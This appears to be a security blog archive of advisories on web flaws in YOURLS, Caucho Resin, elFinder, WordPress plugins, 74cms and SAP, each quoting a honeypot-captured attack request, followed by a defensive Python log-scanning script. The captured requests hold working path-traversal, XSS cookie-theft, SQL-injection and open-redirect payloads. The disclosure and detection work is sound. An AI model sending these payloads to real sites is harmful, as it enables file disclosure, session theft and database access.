Archive for July, 2023

YOURLS-GA-MP-Tracking /GA-Measurement-Protocol/plugin.php HTTP_REFERER Header Handling SSRF

July 19, 2023

A honeypot at a client site caught this being exploited in the wild on 2022-08-09. The software, YOURLS-GA-MP-Tracking, hasn’t been updated since 2016, and requests for a security contact have gone unanswered. The plugin acts on the HTTP Referer header it receives, so a crafted referer can be used to trigger a server-side request forgery flaw.

REDACTED - - [09/Aug/2022:19:01:32 -0400] "GET /GA-Measurement-Protocol/plugin.php HTTP/1.1" 404 737 "ATTACKER-SITE" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"

Caucho Resin /resin-doc/viewfile/ file Parameter Path Traversal Remote File Disclosure

July 18, 2023

A honeypot at a client site caught this being exploited in the wild on 2023-02-14. It’s similar to CVE-2021-44138 in the same software, but uses the file parameter.

REDACTED - - [14/Feb/2023:14:21:04 +0100] "GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1" 404 17187 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"

Studio-42 elFinder /elfinder/php/connector.minimal.php target Parameter Path Traversal Remote File Disclosure

July 13, 2023

A honeypot at a client site caught this being exploited in the wild on 2023-02-14. It’s similar to the vulnerability in the same software and script as CVE-2021-43421, but instead of file upload it allows file disclosure.

REDACTED - - [14/Feb/2023:13:22:01 +0400] "GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1" 404 17186 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"

ActiveHelper LiveHelp Live Chat Plugin for WordPress Multiple Parameter XSS

July 13, 2023

A honeypot at a client site caught this being exploited in the wild on 2023-02-15. It’s basically the same type of vulnerability in the same software and script as CVE-2014-4513, but in two different parameters (MESSAGE and EMAIL).

REDACTED - - [15/Feb/2023:06:22:06 +0100] "GET /wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/s

Welcart e-Commerce Plugin for WordPress /wp-content/plugins/usc-e-shop/functions/progress-check.php progressfile Path Traversal Remote File Disclosure

July 12, 2023

A honeypot at a client site caught this being exploited in the wild on 2023-02-15. It’s basically the same type of vulnerability in the same software and script as CVE-2022-4237, but this one is a classic path traversal:

REDACTED - - [15/Feb/2023:06:22:05 +0100] "GET /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 17187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"

74cms ajax_officebuilding.php key Parameter SQL Injection

July 9, 2023

A honeypot at a client site caught this being exploited in the wild on 2023-02-13. This is the same endpoint seen in this bug report. That report was for the “x” parameter; this request exploits the “key” parameter instead.

REDACTED - [13/Feb/2023:09:36:04 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=\xe9\x8c\xa6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 17187 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"

SAP Web Application Server /sap/bc/BSp/sap/menu/fameset.htm sapexiturl Open Redirect Weakness

July 6, 2023

A honeypot at a client site caught this being exploited in the wild on 2023-06-23. This is the same endpoint seen in this Exploit-DB advisory for a reflected XSS vulnerability, but with a different parameter.

REDACTED - - [23/Jun/2023:22:12:03 -0600] "GET /sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh HTTP/1.1" 404 734 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
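A defender-side triage script for the entries collected in this archive, added here as example code rather than anything from the honeypot or the affected projects: it parses Apache combined-format lines like the ones above and flags the traversal, sensitive-file, XSS, keyword-split SQL injection and external-redirect shapes they exhibit. The sample lines and the 203.0.113.7 address are constructed.

```python
"""Flag the request shapes seen in the honeypot entries above in Apache combined-format access
logs: traversal, sensitive-file reads, reflected XSS, split SQL keywords, external redirect URLs."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format; the ident/user fields vary between entries, so they are skipped loosely.
LOG_RE = re.compile(
    r'^(?P<host>\S+) .*?\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

RULES = {  # applied to the request path and to every decoded, normalised query value
    'path_traversal': re.compile(r'(?:^|/)\.\.(?:/|$)'),
    'sensitive_file': re.compile(r'(?:^|/)(?:web-inf|etc/passwd|etc/shadow|wp-config\.php)\b'),
    'xss': re.compile(r'<\s*/?\s*(?:script|textarea|img|svg|iframe)\b'),
    'sqli': re.compile(r"\bunion\s+(?:all\s+)?select\b|'\s*(?:and|or)\s+\d+\s*=\s*\d+"),
    'open_redirect': re.compile(r'^https?://'),
}

def normalise(value):
    """Decode twice (double encoding), drop the '<>' and '/**/' filler that splits SQL keywords
    (un<>ion sel<>ect), lowercase, and collapse '//' so 'files//..//..' reads 'files/../..'."""
    value = re.sub(r'<>|/\*.*?\*/', '', unquote(unquote(value)).lower())
    return re.sub(r'(?<!:)/{2,}', '/', value)

def classify(line):
    """Return parsed fields plus a sorted list of (rule, parameter) findings for one line."""
    m = LOG_RE.match(line)
    # A truncated line (the log writer cut the request short) is still scanned as raw text.
    url = urlsplit(m.group('target') if m else line)
    values = [('<path>', url.path)] + parse_qsl(url.query, keep_blank_values=True)
    findings = {(rule, name) for name, raw in values
                for rule, rx in RULES.items() if rx.search(normalise(raw))}
    return {'parsed': bool(m), 'path': url.path,
            'status': int(m.group('status')) if m else None, 'findings': sorted(findings)}

# Constructed sample lines modelled on the entries above (RFC 5737 address, shortened UA,
# elFinder target shown already base64-decoded); the last line is deliberately truncated.
SAMPLE_LOG = r'''
203.0.113.7 - - [14/Feb/2023:14:21:04 +0100] "GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1" 404 17187 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Feb/2023:13:22:01 +0400] "GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_/var/www/html/elfinder/files//..//..//..//../etc/passwd&download=1 HTTP/1.1" 404 17186 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Feb/2023:06:22:06 +0100] "GET /wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&EMAIL=x HTTP/1.1" 404 17187 "-" "Mozilla/5.0"
203.0.113.7 - [13/Feb/2023:09:36:04 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=\xe9\x8c\xa6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3%23 HTTP/1.1" 404 17187 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Jun/2023:22:12:03 -0600] "GET /sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2fexample.invalid HTTP/1.1" 404 734 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Feb/2023:06:22:05 +0100] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Feb/2023:06:22:06 +0100] "GET /wp-content/plugins/activehelper-livehelp/server/offline.php?NAME=NAME%22%3E%3Cscript%3Ealert%281%29%3C/s
'''.strip().splitlines()

if __name__ == '__main__':
    for entry in SAMPLE_LOG:
        print(classify(entry)['path'], classify(entry)['findings'])
```

The YOURLS entry is the exception: a referer-driven SSRF leaves nothing distinctive in the request line, so it has to be caught on the egress side (unexpected outbound connections from the web server) rather than in the access log.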
